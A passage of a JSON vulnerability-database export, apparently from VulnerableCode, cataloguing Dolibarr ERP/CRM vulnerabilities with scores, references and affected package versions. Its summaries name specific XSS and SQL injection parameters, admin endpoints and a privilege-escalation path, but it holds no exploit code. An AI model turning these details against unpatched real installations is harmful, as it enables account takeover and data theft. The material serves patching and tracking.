`/adherents/note.php?id=1` endpoint. These scripts are executed in a victim’s browser when they open the page containing the vulnerable field. In the worst case, the victim who inadvertently triggers the attack is a highly privileged administrator. The injected scripts can extract the Session ID, which can lead to full Account takeover of the admin and due to other vulnerability (Improper Access Control on Private notes) a low privileged user can update the private notes which could lead to privilege escalation.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-25955","reference_id":"","reference_type":"","scores":[{"value":"0.00415","scoring_system":"epss","scoring_elements":"0.61935","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-25955"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"9.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/796b2d201acb9938b903fb2afa297db289ecc93e","reference_id":"","reference_type":"","scores":[{"value":"9.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/796b2d201acb9938b903fb2afa297db289ecc93e"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25955","reference_id":"","reference_type":"","scores":[{"value":"9.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25955"},{"reference_url":"https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25955","reference_id":"","reference_type":"","scores":[{"value":"9.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25955"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/370744?format=json","purl":"pkg:composer/dolibarr/dolibarr@13.0.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@13.0.3"},{"url":"http://public2.vulnerablecode.io/api/packages/76015?format=json","purl":"pkg:composer/dolibarr/dolibarr@14.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.0"}],"aliases":["CVE-2021-25955","GHSA-cpv8-6xgr-rmf6"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-uc33-xses-ykft"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/42696?format=json","vulnerability_id":"VCID-uzvh-dkqr-8ubf","summary":"Dolibarr Cross Site Scripting (XSS) vulnerability\nA Cross Site Scripting (XSS) vulnerability exists in Dolibarr before 14.0.3 via the ticket creation flow. Exploitation requires that an admin copies the payload into a box.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-42220","reference_id":"","reference_type":"","scores":[{"value":"0.00271","scoring_system":"epss","scoring_elements":"0.50706","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-42220"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-42220","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-42220"},{"reference_url":"https://packetstormsecurity.com/files/164544/Dolibarr-ERP-CRM-14.0.2-Cross-Site-Scripting-Privilege-Escalation.html","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://packetstormsecurity.com/files/164544/Dolibarr-ERP-CRM-14.0.2-Cross-Site-Scripting-Privilege-Escalation.html"},{"reference_url":"https://truedigitalsecurity.com/advisory-summary-2021","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://truedigitalsecurity.com/advisory-summary-2021"},{"reference_url":"https://github.com/advisories/GHSA-jqfp-m5f8-vg28","reference_id":"GHSA-jqfp-m5f8-vg28","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jqfp-m5f8-vg28"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/76934?format=json","purl":"pkg:composer/dolibarr/dolibarr@14.0.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.3"}],"aliases":["CVE-2021-42220","GHSA-jqfp-m5f8-vg28"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-uzvh-dkqr-8ubf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/38041?format=json","vulnerability_id":"VCID-v437-y5bb-nudu","summary":"Dolibarr Improper Input Validation vulnerability\nImproper Access Control in Dolibarr ERP CRM <= v17.0.3 allows an unauthorized authenticated user to read a database table containing customer data","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-4198","reference_id":"","reference_type":"","scores":[{"value":"0.00079","scoring_system":"epss","scoring_elements":"0.23546","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-4198"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/3065b9ca6ade988e8d7a8a8550415c0abb56b9cb","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/3065b9ca6ade988e8d7a8a8550415c0abb56b9cb"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/3065b9ca6ade988e8d7a8a8550415c0abb56b9cb#diff-7d68365a708c954051853ade884c7e97c6ff13150ee92657d6ffc8603e0f947b","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T19:56:24Z/"}],"url":"https://github.com/Dolibarr/dolibarr/commit/3065b9ca6ade988e8d7a8a8550415c0abb56b9cb#diff-7d68365a708c954051853ade884c7e97c6ff13150ee92657d6ffc8603e0f947b"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-4198","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-4198"},{"reference_url":"https://starlabs.sg/advisories/23/23-4198","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T19:56:24Z/"}],"url":"https://starlabs.sg/advisories/23/23-4198"},{"reference_url":"https://github.com/advisories/GHSA-48v2-596x-4jr9","reference_id":"GHSA-48v2-596x-4jr9","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-48v2-596x-4jr9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/67209?format=json","purl":"pkg:composer/dolibarr/dolibarr@18.0.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@18.0.0"}],"aliases":["CVE-2023-4198","GHSA-48v2-596x-4jr9"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-v437-y5bb-nudu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/60053?format=json","vulnerability_id":"VCID-vhht-9j9w-5bhr","summary":"Dolibarr SQL Injection vulnerability\nSQL Injection vulnerability in Dolibarr before version 7.0.2 allows remote attackers to execute arbitrary SQL commands via the sortfield parameter to /accountancy/admin/accountmodel.php, /accountancy/admin/categories_list.php, /accountancy/admin/journals_list.php, /admin/dict.php, /admin/mails_templates.php, or /admin/website.php.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2018-9019","reference_id":"","reference_type":"","scores":[{"value":"0.01997","scoring_system":"epss","scoring_elements":"0.83929","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2018-9019"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/blob/7.0.2/ChangeLog","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/blob/7.0.2/ChangeLog"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/83b762b681c6dfdceb809d26ce95f3667b614739","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/83b762b681c6dfdceb809d26ce95f3667b614739"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2018-9019","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2018-9019"},{"reference_url":"https://www.oracle.com/security-alerts/cpujan2021.html","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"reference_url":"https://github.com/advisories/GHSA-fff9-m6f6-q3mh","reference_id":"GHSA-fff9-m6f6-q3mh","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-fff9-m6f6-q3mh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112143?format=json","purl":"pkg:composer/dolibarr/dolibarr@7.0.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-6v7h-3zbv-eqgt"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-7ee4-1bfq-efd3"},{"vulnerability":"VCID-7khd-yhd5-6ydu"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-e6hj-wmum-tygv"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-exs6-buy9-zfcn"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-m2e3-q7zb-uuhh"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-yrys-ch5x-23bv"},{"vulnerability":"VCID-zve5-afaq-mkh8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@7.0.2"}],"aliases":["CVE-2018-9019","GHSA-fff9-m6f6-q3mh"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vhht-9j9w-5bhr"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/53984?format=json","vulnerability_id":"VCID-w7kv-4ajd-7ke6","summary":"Dolibarr CRM allows Privilege Escalation\nDolibarr CRM before 11.0.5 allows privilege escalation. This could allow remote authenticated attackers to upload arbitrary files via societe/document.php in which \"disabled\" is changed to \"enabled\" in the HTML source code.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2020-14201","reference_id":"","reference_type":"","scores":[{"value":"0.00146","scoring_system":"epss","scoring_elements":"0.34698","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2020-14201"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/blob/e76641c491e4105e9cb1ded6149771c621d822b5/ChangeLog#L2933","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/blob/e76641c491e4105e9cb1ded6149771c621d822b5/ChangeLog#L2933"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14201","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14201"},{"reference_url":"https://www.wizlynxgroup.com/security-research-advisories/vuln/WLX-2020-011","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.wizlynxgroup.com/security-research-advisories/vuln/WLX-2020-011"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/100581?format=json","purl":"pkg:composer/dolibarr/dolibarr@11.0.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@11.0.5"}],"aliases":["CVE-2020-14201","GHSA-25h3-mw3p-w8r7"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-w7kv-4ajd-7ke6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/60933?format=json","vulnerability_id":"VCID-w8pm-m6yc-5bfb","summary":"Dolibarr Cross-site scripting (XSS) vulnerability\nCross-site scripting (XSS) vulnerability in Dolibarr before 7.0.2 allows remote attackers to inject arbitrary web script or HTML via the foruserlogin parameter to adherents/cartes/carte.php.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2018-10095","reference_id":"","reference_type":"","scores":[{"value":"0.475","scoring_system":"epss","scoring_elements":"0.9775","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2018-10095"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/blob/7.0.2/ChangeLog","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/blob/7.0.2/ChangeLog"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/1dc466e1fb687cfe647de4af891720419823ed56","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/1dc466e1fb687cfe647de4af891720419823ed56"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2018-10095","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2018-10095"},{"reference_url":"https://sysdream.com/news/lab/2018-05-21-cve-2018-10095-dolibarr-xss-injection-vulnerability","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://sysdream.com/news/lab/2018-05-21-cve-2018-10095-dolibarr-xss-injection-vulnerability"},{"reference_url":"http://www.openwall.com/lists/oss-security/2018/05/21/3","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://www.openwall.com/lists/oss-security/2018/05/21/3"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112143?format=json","purl":"pkg:composer/dolibarr/dolibarr@7.0.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"}